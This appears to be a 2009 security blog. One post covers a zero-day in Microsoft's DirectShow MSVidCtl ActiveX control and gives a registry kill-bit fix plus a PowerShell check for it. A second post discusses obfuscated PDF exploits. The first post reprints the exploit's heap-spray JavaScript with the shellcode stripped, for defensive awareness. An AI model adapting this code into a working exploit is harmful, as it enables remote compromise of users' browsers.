
Monday, July 6, 2009

New 0-day in Microsoft DirectShow

There's news of a new 0-day exploit for Microsoft's MSVidCtl.DLL (DirectShow) doing the rounds. The exploit code is publicly available on several Chinese Web sites - so be careful. There'll be plenty of noise this week concerning this 0-day.

The CSIS site has some details - and I find it disconcerting that there was any expectation that AV would preemptively detect/stop this.

You can help protect against exploitation of this control by setting the kill bit for its CLSID; the .reg entry below does that:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400
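As an added example (mine, not from the original post or from CSIS), here is a PowerShell script that checks whether the kill bit above is actually in place on a machine and sets it if it is missing. The CLSID and the 0x400 flag value are taken from the post; the function names are my own.

```powershell
# Added example (not from the original post): check, and optionally set, the ActiveX
# kill bit for the MSVidCtl control. CLSID and the 0x400 value come from the post.
$MsVidCtlClsid = '{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}'
$KillBit       = 0x400   # "Compatibility Flags" bit that stops IE instantiating the control

function Get-CompatFlagsPath {
    param([string]$Clsid)
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
}

function Get-CompatFlags {
    # Returns the current "Compatibility Flags" DWORD, or 0 if the key/value is absent.
    param([string]$Clsid)
    $key = Get-CompatFlagsPath $Clsid
    if (-not (Test-Path $key)) { return 0 }
    $item = Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }
    return [int]$item.'Compatibility Flags'
}

function Test-KillBit {
    param([string]$Clsid)
    ((Get-CompatFlags $Clsid) -band $KillBit) -ne 0
}

function Set-KillBit {
    # OR the kill bit into the existing flags so any other compatibility bits survive.
    # Needs an elevated shell; -WhatIf previews the change without writing the registry.
    [CmdletBinding(SupportsShouldProcess)]
    param([string]$Clsid)
    $key = Get-CompatFlagsPath $Clsid
    $new = (Get-CompatFlags $Clsid) -bor $KillBit
    if ($PSCmdlet.ShouldProcess($key, ('Set Compatibility Flags to 0x{0:X8}' -f $new))) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $new -Type DWord
    }
}

# Report the current state; only write to the registry if the bit is missing.
if (Test-KillBit $MsVidCtlClsid) {
    "Kill bit already set for $MsVidCtlClsid (flags 0x{0:X8})" -f (Get-CompatFlags $MsVidCtlClsid)
} else {
    "Kill bit NOT set for $MsVidCtlClsid; setting it now"
    Set-KillBit $MsVidCtlClsid
    Test-KillBit $MsVidCtlClsid   # should now report True
}
```

Run it from an elevated PowerShell; the same Test-KillBit check can be pointed at any other CLSID you want to audit.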

Details of the exploit are available on the CSIS web site, but the code is also included below (with the shellcode removed):

var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;

[SHELL CODE REMOVED]

var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
    omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
    shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)
    memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

Wednesday, June 3, 2009

Obfuscated PDF Exploits

This year has seen a flurry of PDF-related vulnerabilities and exploits circulating (several of them being zero-day). The specifics of the vulnerabilities vary marginally, but all in all I'd attribute the source to be Adobe trying to do too much with their portable document format without due consideration for the complexity they are introducing to the format. That complexity is coming back and biting both Adobe and everyone obliged to have Acrobat installed on their system.

I know that Adobe make reasonable investments in their security QA and even employ some of the best consulting bug-hunters out there today. However, the complexity of their product - in particular their rapidly evolving scripting language support - is turning into a real pain in the arse.

Casting that pain-point aside, it's been interesting studying the exploit techniques being used by the bad guys leveraging the vulnerabilities within the Acrobat PDF format. As with most exploits, copy-paste is rife, with (by my estimation) the majority of "new" attacks being tweaks to existing exploits or techniques - which has been the pattern for practically every Web browser exploit.

Sticking with the decade of Web browser exploit evolution as a yardstick, we're only now just seeing some of what I'd call "advanced" script obfuscation techniques making their way to the PDF exploits. I think a lot of it has to do with the fact that most perimeter defence technologies have now incorporated good PDF document parsers and can see deeper into the files (early on the PDF content was just "some kind of file" and detection was simple string matching).

The results are some interesting obfuscation techniques particular to PDFs rather than generic HTML-based JavaScript. For the time being these obfuscation techniques are specific to their authors (i.e. little copy-paste going on), so they can serve as decent markers of their origination point. In the longer run, the copy-paste brigade will muddy those waters - and perhaps the best-of-the-best will become metamorphic creation tools by the end of the year.

If you're after a little more reading on the subject, the folks over at WebSense have posted a nice blog today titled Complex obfuscated PDF exploit.